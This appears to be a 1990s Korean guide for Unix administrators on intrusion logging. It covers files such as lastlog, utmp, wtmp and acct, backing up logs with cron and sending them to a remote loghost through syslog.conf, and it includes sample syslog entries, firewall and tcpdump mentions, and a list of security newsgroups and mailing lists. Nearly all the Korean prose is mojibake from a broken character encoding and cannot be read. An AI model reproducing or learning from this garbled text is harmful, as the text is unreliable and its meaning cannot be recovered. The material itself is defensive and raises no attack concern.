ÇϳªÀÇ ½ÃÀÛ¿¡ ºÒ °úÇÏ´Ù. ÀÌ ÀýÀÇ ³»¿ëÀ» Á¤¸®Çϸé, ½Ã½ºÅÛ¿¡ ·Î±×ÀÎ ÇÏ°í ·Î±×¾Æ¿ôÇÏ¸é ±× ±â·ÏÀÌ ¾îµò°¡ ³²´Â´Ù´Â °ÍÀε¥. ´ÙÀ½ÀÇ ³×°¡Áö ÆÄÀÏ ÀÌ ´ëÇ¥ÀûÀÌ´Ù. /usr/adm/lastlog °¢ À¯Àú¸¶´Ù °¡Àå ÃÖ±ÙÀÇ ·Î±×ÀÎ ½Ã°£À» ±â·ÏÇÑ´Ù. finger ³ª someone ¿¡ ÀÇÇØ ¾Ë ¼ö ÀÖ´Ù. /etc/utmp À¯Àú°¡ ·Î±×ÀÎ ÇÒ ¶§¸¶´Ù ½Ã°£À» Àû¾îµÐ´Ù. /usr/adm/wtmp À¯Àú°¡ ·Î±×ÀÎ/·Î±× ¾Æ¿ôÇÒ ¶§ ½Ã°£À» Àû¾îµÐ´Ù. last ¶Ç´Â last someone ÀÇ ¸í·ÉÀ» Ãļ­ ³»¿ëÀ» ¾Ë¼öÀÖ´Ù. /usr/adm/acct À¯ÀúµéÀÌ »ç¿ëÇÏ´Â ¸í·É¾î¸¦ Àû¾îµÐ´Ù. lastcomm À» Ä¡¸é ³»¿ëÀ» ¾Ë ¼ö ÀÖ´Ù. ÇÏÁö¸¸, ½ÇÁ¦·Î ÇØÄ¿µéÀº ÀÌ ¸ðµç ÆÄÀϵéÀ» Áö¿ì°í ³ª°¡´Â °ÍÀÌ º¸ÅëÀ̸ç(»ý°¢À» º¸¶ó, ³ª°¥ ¶§ ÀڱⰡ µé¾î¿Ô´Ù´Â Áõ°Å¸¦ ÀÔ¸ê ÇÏ°í ³ª°¡´Â °ÍÀÌ ÇØÄ¿ÀÇ ÀÔÀåÀ¸·Î ¼­´Â ´ç¿¬ÇÑ °ÍÀÌ ¾Æ´Ï°Ú´Â°¡), µû¶ó¼­ ÀÏÁ¤ÇÑ ½Ã°£ °£°Ý¸¶´Ù ȤÀº ÇÏ·çÀÇ ¾î´À ¶§¿¡ ¼öÇàÇÏ µµ·Ï Á¦¾îÇØÁÖ´Â cron¸í·ÉÀ» ÀÌ¿ëÇØ °è¼Ó À§ÀÇ ÆÄÀÏÀ» ¹é¾÷À» ÇÑ´Ù¸é ÇØÄ¿¸¦ Á»´õ ¾î·Æ°Ô ¸¸µé ¼ö ÀÖ°Ú´Ù. ÀÌ´Â °ü¸®ÀÚ¿¡°Ô ÇÊ¿ä ÇÑ ºÎºÐÀÌÁö¸¸, ¾ÈÀüÇÑ È£½ºÆ®¸¦ ¼±ÅÃÇØ log¸¸À» ³²±â´Â È£½ºÆ®¸¦ µÎ¸é ´õ¿í È®½ÇÇÏ´Ù.(ÀÌ´Â ¹°·Ð Àåºñ¿¡ ¿©À¯°¡ ÀÖÀ» ¶§ÀÇ ÀÌ¾ß ±âÀÌ´Ù) ¿¹¸¦ µé¸é, /etc/syslog.conf ¿¡¼­ Á¤ÀǸ¦ Çϵµ·Ï ÇÏÀÚ. # # syslog configuration file # define LOGHOST eve *.err;kern.debug;auth.notice;user.none /dev/console mail.debug ifdef('LOGHOST',/var/log/syslog,@loghost) mail.debug /var/log/syslog ·Î±× È£½ºÆ®¸¦ ¼³Á¤ÇÑ ¿¹¸¦ µé¾îº¸ÀÚ. ´ÙÀ½ ·Î±×´Â ·Î±× È£½ºÆ®ÀÎ eldar ÀÇ ·Î±× ÆÄÀÏ¿¡ ±â·ÏµÈ °ÍÀÌ´Ù. elbereth, luthien, be ren, eru, frodo, sam, aragorn, gandalf, faramir, legolasgimli, indigo1,3,4,10, applicÀÌ eldar·Î ·Î±×¸¦ º¸³»µµ·Ï ¼³Á¤µÅÀÖ´Ù. Mar 17 02:43:28 6C:eldar fingerd[17516]: connect from baikdu.kaist.ac.kr Mar 17 02:43:42 6D:eldar ftpd[17518]: connection from baikdu.kaist.ac.kr Mar 17 02:43:54 5E:eldar ftpd[17518]: FTP LOGIN FAILED FROM baikdu.kaist.ac.kr, chester Mar 17 02:44:15 6E:eldar ftpd[17518]: FTP LOGIN FROM baikdu.kaist.ac.kr as chester Mar 17 09:37:16 6C:luthien.seri.re.kr sendmail[10578]: JAA10572: to=sysuh@kigam.re.kr, ctladdr=news (15/15), delay=00:0 0:09, mailer=smtp, relay=sdp.kigam.re.kr. [134.75.144.201], stat=Sent (JAA15213 Message accepted for delivery) Mar 17 13:31:46 6B:frodo.seri.re.kr Xsession: poison: login Mar 17 13:40:32 6C:gimli.seri.re.kr ftpd[533]: connect from eve.kaist.ac.kr Mar 17 13:49:32 6D:indigo1.seri.re.kr ftpd[533]: connection from robin.kaist.ac.kr ÀÌ·± ¹æ¹ý ¿Ü¿¡µµ ÆÄÀ̾î¿ù, TCP wrapper µîÀ» ÀÌ¿ëÇØ ¾Æ¿¹ ¿ÜºÎ¿¡¼­ÀÇ Á¢±ÙÀ» ¸·¾Æ¹ö¸± ¼ö ÀÖ´Ù. ¹°·Ð tcpdump³ª netmonµéÀ» »ç¿ëÇØ ÀÚ½ÅÀÇ È£½ºÆ®·ÎÀÇ ¸ðµç Á¢±ÙÀ» °¨½ÃÇÒ ¼öµµ ÀÖ´Ù. ÀÌ¿Í °°ÀÌ ¹æ¾îÇÏ´Â ±â¼úµµ Á¡Á¡ °íµµÈ­°¡ µÇ¾î °í¼öÁØÀÇ ÇØÄ¿°¡ ¾Æ´Ï ¸é ħÅõÇϱ⠾î·Á¿î È£½ºÆ®°¡ ´Ã¾î°¡°í ÀÖ´Ù. ±× ¹«¼öÇÑ ¹ö±×µéÀ» ¸ðµÎ ¸Ó¸®¿¡ ¿Ü¾îµÎ°í À̸¦ ¸ðµÎ ÆÐÄ¡Çϱâ¶õ »ó´çÈ÷ ¾î·Á¿î ÀÏÀÌ´Ù. ÀÌ·± °æ¿ì¿¡´Â º¸¾ÈÅøÀ» ÀÌ¿ëÇÏ¿© ü Å©¸¦ ÇÏ´Â °ÍÀÌ ¸¹Àº ½Ã°£À» Àý¾àÇÒ ¼ö ÀÖ°Ô µÈ´Ù. o ´º½º±×·ì o ¸ÞÀϸµ ¸®½ºÆ® alt.2600 cert-advisory@cert.org alt.2600.hope.tech ciac-listproc@llnl.gov alt.cracks majordomo@suburbia.net alt.hackers majordomo@greatcircle.com alt.hackintosh bugtraq-request@crimelab.com alt.hacker.malicious majordomo@8lgm.org alt.security security@baikdu.kaist.ac.kr alt.security.pgp alt.security.ripem comp.risks comp.security.announce comp.security.misc comp.security.unix misc.security